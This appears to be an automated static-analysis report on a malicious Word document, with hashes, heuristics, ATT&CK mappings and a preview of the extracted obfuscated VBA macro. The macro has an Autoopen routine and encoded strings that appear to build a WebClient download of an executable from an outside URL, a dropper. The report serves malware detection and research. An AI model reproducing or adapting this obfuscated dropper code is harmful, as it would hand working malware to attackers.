Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c4ddf18e72385c6…

MALICIOUS

Office (OLE)

Size: 159.5 KB
Created: 2018-05-16 07:31:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 3363e41b826ea928456b10bb7a425b3b
SHA-1: ee071f5e54ba408540deccc2545611516a7f92f1
SHA-256: 2c4ddf18e72385c69ca425f9a89f65bcf0fffb367ee6adb0315db0874c4a3a5a
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6546187-0' further supports its nature as a dropper. The macro's obfuscated nature and the presence of the Shell() call suggest it is designed to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6546148-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6546148-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  137834 bytes
SHA-256 (macros.bas): 7a4a94a5cb6cf61591a02627dcf583c4bee4513e2e4555449a5b4e648df41270
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "rdDSmpfqaDQY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZpLErQ(JsQGF)
SzNSA = jdWCc
wZlDAw = mjjXMU + CDbl(73044 - PwbMH - zYnBv + CDbl(1868)) - 25848 - CDbl(20421)
DnjIu = lGrRXS
lbBwO = 6488
End Sub
Sub ivpVW(BwBFzV)
QdkdLr = isjvjG
nLzzmK = oIzNlz + CDbl(79699 - FlUBqF - rYmWb + CDbl(75105)) - 74308 - CDbl(21345)
lQUNnB = LLicU
PZumrm = 96320
hPXfTb = PiGBz
bVcbw = dIqId + CDbl(75661 - IMcpv - NTDAwi + CDbl(37584)) - 50079 - CDbl(94071)
dcaXln = RKsjU
rHtrQ = 35821
nsLBki = Ujtfd
NNjCPS = IKfCQ + CDbl(86381 - MtCqD - wIkRZ + CDbl(75057)) - 4076 - CDbl(30479)
lRNFnF = brbzzq
NIlrhL = 51984
End Sub
Sub CcWiEc(dcQFY)
NoKFv = SLOFJI
XInvUE = IPljE + CDbl(632 - MOwhs - EzTal + CDbl(73116)) - 57182 - CDbl(16623)
nWMaa = GphwB
QwDbB = 91373
GwQXRq = XoMKia
pcOXi = wFZRlr + CDbl(4203 - AQzkqz - VXzuj + CDbl(99967)) - 64217 - CDbl(33641)
XNaPaW = DWVjAX
maolWY = 25398
End Sub
Sub Autoopen()
On Error Resume Next
rczUE = dvaPo
uXQmOi = wNVNCw + CDbl(47443 - TuOKs - zWzRG + CDbl(33669)) - 49645 - CDbl(51097)
vULaEP = BXszR
WPvVj = 5300
ZAKOqSA (ALEvh + BoXpINiVkY + BSVIMB)
lasqY = zJtrR
wkziWk = XRbjQQ + CDbl(86230 - NrjPf - vbwWFw + CDbl(22655)) - 10196 - CDbl(675)
UmAjM = kwXbi
JrcZf = 25472
End Sub
Sub RMbmwC(DMRnZ)
QUOdP = vMHhs
SrRFt = RwVjut + CDbl(397 - jCwXh - CMnocz + CDbl(19414)) - 42467 - CDbl(35039)
Jijij = rwSlW
whaVdO = 55277
OjzIBF = dcuVv
wZPJRV = LzFwM + CDbl(52661 - GOHVv - aIZiah + CDbl(51109)) - 15394 - CDbl(27606)
YQbuz = KLLsH
OiDwap = 95097
UYZBG = zlikuN
ihfljS = EvKClt + CDbl(89638 - aiHlKA - zrZoH + CDbl(16319)) - 48811 - CDbl(55745)
wujkzY = tWzKY
WQMvE = 19418
End Sub
Sub dJCzd(nLsLpi)
iErKK = CTNOKp
lVJcME = Yworl + CDbl(13847 - kzALK - FfRYBk + CDbl(10845)) - 14854 - CDbl(69896)
vrHAw = CQwlP
kPAYDj = 34098
End Sub

Attribute VB_Name = "MDAKWFDlac"
Sub Hoitzi(SRwkN)
PLvBX = hWpPCs
wirPRp = mIFBW + CDbl(1336 - wQzYcp - vKJBNz + CDbl(89838)) - 54223 - CDbl(33796)
jBIib = CfurmH
tfXik = 12043
End Sub
Function BoXpINiVkY()
On Error Resume Next
raCPAU = NEsbKq
VUsLVo = shwooE + CDbl(30775 - pOKVb - FzshHu + CDbl(79913)) - 51897 - CDbl(5065)
cQZYK = WPRtwt
bMQRq = 27674
vqdSi = AAItW
Xcdqa = uKOion + CDbl(34171 - ThIai - qYXDU + CDbl(18206)) - 35114 - CDbl(47558)
crBZvI = QqsTYJ
QBqBi = 87545
btWzfMZ = ombRc("Kke//:0BO+0BOp0BO'+'+0BOtth 0BO+0BO VB00BO+0BO 0BO+0BO= XCDAW8C0BO+'+'0BO;)33120BO+0BO82zLa%", 37547 + 5 - 37547, 37547 + 86 - 37547)
riPNf = FZVRPW
lnnNW = fQShKl + CDbl(63567 - GBiIn - ilImMQ + CDbl(18208)) - 66655 - CDbl(82836)
bECwW = OdijOC
BEbwi = 97203
YEFwzk = jtEmP
nnElJj = sNlnFW + CDbl(14821 - UTsRp - RaSbG + CDbl(4777)) - 20259 - CDbl(69758)
jYzWj = ZnLoEi
TRtcd = 8923
vUmpviOb = ombRc("IIlxUK/ku.oc.0BO+0BOt0BO+0BOfos0BO+0BOegami/0BO+0BO/:0BO+0BOptth@/'+'0BO+0BOd4ojLj/0BO'+'+0BOed0BO+0BO.0BO+0BOepp0BO+0BOurg0BO+0BO-y0BO+0BOs0BO+0BOaOYLP1", 45162 + 6 - 45162, 45162 + 146 - 45162)
aLUab = NlKDj
IrBOI = bIujh + CDbl(55513 - ZGGAhd - FUuYD + CDbl(43731)) - 88924 - CDbl(19821)
ncIHoa = SCkcB
UudrqC = 30468
wGzim = mJpomo
NPUJQ = zZHstI + CDbl(27046 - JoOCcq - Tjiuz + CDbl(34047)) - 795 - CDbl(76591)
KSZFco = jEoNrr
DWYwd = 39464
zGnPfmZS = ombRc("CaO0+VB0xe.VB00BO+0BO( + 0BO+0BOBSN0BO+0BOW0BO+0BO8C0BO+0BO 0BO+0BO+0BO+0NW9c%", 12796 + 6 - 12796, 12796 + 71 - 12796)
mJwEtj = PTLwlO
biIHVG = wocVcS + CDbl(58331 - YSWTR - JaAjE + CDbl(90685)) - 31970 - CDbl(70656)
OFcjcn = rINso
VjQQI = 83864
AIVCz = dzzCJ
RETYaH = jbROQd + CDbl(63668 - jfruO - ClIrJ + CDbl(47566)) - 33635 - CDbl(239)
sCTsb = HDBOU
djuFZ = 34845
LfkcQRBfwv = ombRc("afhe0B'+'O+0BOi0BO+0BOlCbeW.teN.0BO+0BOm'+'0BO+0BOetsy0BO+0BOS )VB0tcejb0BO'+'+0BOo-VB0BLljIN3", 89786 + 7 - 89786, 89786 + 85 - 89786)
uRGHu = PTLjQ
ijUYLw = Fjcbpj + CDbl(88600 - YBOlk - LGpmu + CDbl(46690)) - 54315 - CDbl(22099)
wWk
... (truncated)